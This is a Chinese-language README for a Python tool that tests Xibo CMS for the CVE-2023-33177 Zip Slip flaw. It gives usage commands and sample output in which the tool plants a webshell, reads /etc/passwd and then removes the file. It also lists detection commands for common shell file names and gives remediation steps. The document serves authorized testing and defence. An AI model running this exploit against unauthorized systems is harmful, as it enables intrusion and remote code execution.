针对 CVE-2023-33177 的自动化安全测试工具——Xibo CMS 中的 Zip Slip 路径遍历漏洞,可导致远程代码执行(RCE)。
此工具仅用于教育和授权测试目的。 仅在您拥有或已获得明确许可的系统上使用。 未经授权的测试是非法且不道德的。
Xibo CMS 版本 1.8.0-2.3.16 和 3.0.0-3.3.4 在布局导入功能中存在路径遍历攻击漏洞。本工具通过尝试写入一个无害的测试文件,安全地检测您的 Xibo 实例是否存在漏洞。
## 克隆仓库
git clone [email protected]:kaxm23/-CVE-2023-33177-.git
cd xibo-cve-2023-33177-tester
## 安装依赖
pip install -r requirements.txt## -CVE-2023-33177-
基本命令结构
python test_cve_2023_33177.py <URL> <username> <password>
## 本地开发实例
python test_cve_2023_33177.py http://localhost/xibo admin password123
## 使用 HTTPS 的远程生产环境
python test_cve_2023_33177.py https://xibo.example.com [email protected] SecurePass2024!
## 自定义端口和路径
python test_cve_2023_33177.py http://192.168.1.100:8080/xibo admin mypassword
## 不带尾部斜杠(脚本会自动处理)
python test_cve_2023_33177.py https://example.com/xibo admin pass
[*] 正在测试 Xibo CMS at http://localhost/xibo
[*] CVE-2023-33177 - Zip Slip RCE 测试
[+] 已创建测试载荷: test_vuln_1703123456.zip
[+] 已成功以 admin 身份登录
[*] 正在尝试导入恶意布局...
[*] 导入响应: HTTP 200
[*] 正在检查 webshell...
[!] 存在漏洞!Webshell 访问地址: http://localhost/security_test.php
[+] 成功读取 /etc/passwd
[*] 输出预览: VULN_TEST_root:x:0:0:root:/root:/bin/bash...
[!] 网站存在 CVE-2023-33177 漏洞!
[!] 修复建议: 将 Xibo CMS 升级至 3.3.5+ 或 2.3.17+
[!] 删除测试文件: security_test.php
[*] 正在测试 Xibo CMS at http://localhost/xibo
[*] CVE-2023-33177 - Zip Slip RCE 测试
[+] 已创建测试载荷: test_vuln_1703123456.zip
[+] 已成功以 admin 身份登录
[*] 正在尝试导入恶意布局...
[*] 导入响应: HTTP 200
[*] 正在检查 webshell...
[-] 未找到 webshell (HTTP 404)
[+] 网站似乎不存在漏洞(或路径不同)
## 下载最新版本
wget https://github.com/xibosignage/xibo-cms/releases/latest
## 按照升级说明操作
## https://xibo.org.uk/manual/en/upgrade.html
## 在 web 根目录中查找最近修改的 PHP 文件
find /var/www/html -name "*.php" -mtime -7 -type f
## 检查可疑文件
find /var/www/html -name "shell.php" -o -name "cmd.php" -o -name "backdoor.php"
## 审查访问日志中的未授权导入记录
grep "layout/import" /var/log/apache2/access.log
更改所有 CMS 用户密码
轮换 API 密钥和令牌
审查并删除未授权的用户账户
`
📋 环境要求
Python 3.6 或更高版本
requests 库(通过 pip 安装)
有效的 Xibo CMS 凭据(需要身份验证)
可访问目标 Xibo 实例的网络连接
Fork 本仓库
创建功能分支: git checkout -b feature/amazing-feature
提交更改: git commit -m 'Add amazing feature'
推送分支: git push origin feature/amazing-feature
发起 Pull Request
贡献要求
代码必须遵循 PEP 8 标准
测试必须保持非破坏性
文档必须更新
不得对未授权的目标进行实机测试
本项目采用 MIT 许可证 - 详情请参见 LICENSE 文件。
⚖️ 法律与道德使用
使用此工具即表示您同意:
仅测试您拥有或已获得明确书面许可的系统
遵守所有当地、州和联邦法律
不得将此工具用于恶意目的
负责任地向供应商报告漏洞
对自己的行为承担全部责任
CVE-2023-33177 NVD 条目
Xibo 安全公告
Zip Slip 漏洞详情
OWASP 路径遍历指南
问题反馈: GitHub Issues
安全报告: 请通过 GitHub 私有漏洞报告功能负责任地披露
疑问: 在 GitHub 上发起讨论
如果此工具对您有帮助,请考虑给仓库加星!